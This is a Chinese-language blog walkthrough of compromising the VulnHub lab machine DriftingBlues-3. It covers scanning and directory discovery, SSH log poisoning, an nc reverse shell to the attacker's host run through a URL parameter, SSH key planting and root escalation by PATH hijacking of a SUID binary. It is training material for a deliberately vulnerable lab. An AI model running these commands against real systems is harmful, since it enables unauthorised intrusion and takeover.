vuluhub靶机:driftingblues-3

一:主机发现

arp-scan -I eth0 10.9.23.0/24

二:端口扫描

nmap -T4 -sV -p- -A 10.9.23.180

三:端口探测

发现一张图片,没有其他发现

四:目录探测

dirb http://10.9.23.180

http://10.9.23.180/phpmyadmin/

得到一串abc

http://10.9.23.180/privacy/

得到一串ab

http://10.9.23.180/secret/

得到一串a

dirsearch -u http://10.9.23.180/

查看

10.9.23.180/robots.txt

发现一个目录

/eventadmins

/littlequeenofspades.html

查看源码发现base64编码

aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

解码得到

intruder? L2FkbWluc2ZpeGl0LnBocA==

继续解码

/adminsfixit.php

得到一个目录

可以看到这个文件可以获取 ssh auth log,所以可以尝试往日志文件写入一句话后门

五:漏洞利用

尝试登陆 SSH 写入 shell:

ssh ''@10.9.23.180

x指纹参数试试

试试反弹shell

在 kali 中开启监听:nc -lvp 6666
加入命令,访问 URL:
http://10.9.23.180/adminsfixit.php?x=nc 10.9.23.112 6666 -e /bin/bash
反弹 shell 成功

使用 Python 切换 bash:

python3 -c 'import pty;pty.spawn("/bin/bash")'

home目录下发现用户robertj

既然没有私钥秘钥,咱们生成一下

ssh-keygen -t rsa
将生成的私钥保存到
/home/robertj/.ssh/id_rsa

将 SSH 公钥文件另存为 authorized_keys,用于 SSH 登陆认证

python2 -m SimpleHTTPServer 9998

wget http://10.9.23.180:9998/id_rsa

将私钥复制到本地

nano id_rsa

chmod 755 id_rsa

chmod 400 id_rsa

ssh robertj@10.9.23.180 -i id_rsa

登录成功

得到第一个flag

六:提权

在 shell 中寻找 suid 程序:

find / -perm -u=s -type f 2>/dev/null

发现一个不常见的程序

/usr/bin/getinfo

根据上面输出的结果,可以推测这个程序中执行了

ip addr, cat /etc/hosts, uname -a
因此,在这种情况下,我们可以在环境变量 PATH 中提供一个目录 (/tmp),并创建一个 ip
或者 cat 文件,用于劫持命令,执行我们自定义的二进制文件就可以提权

export PATH=/tmp/:$PATH
cd /tmp
echo '/bin/bash' > ip
chmod +x ip
/usr/bin/getinfo

得到flag2,靶机结束

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值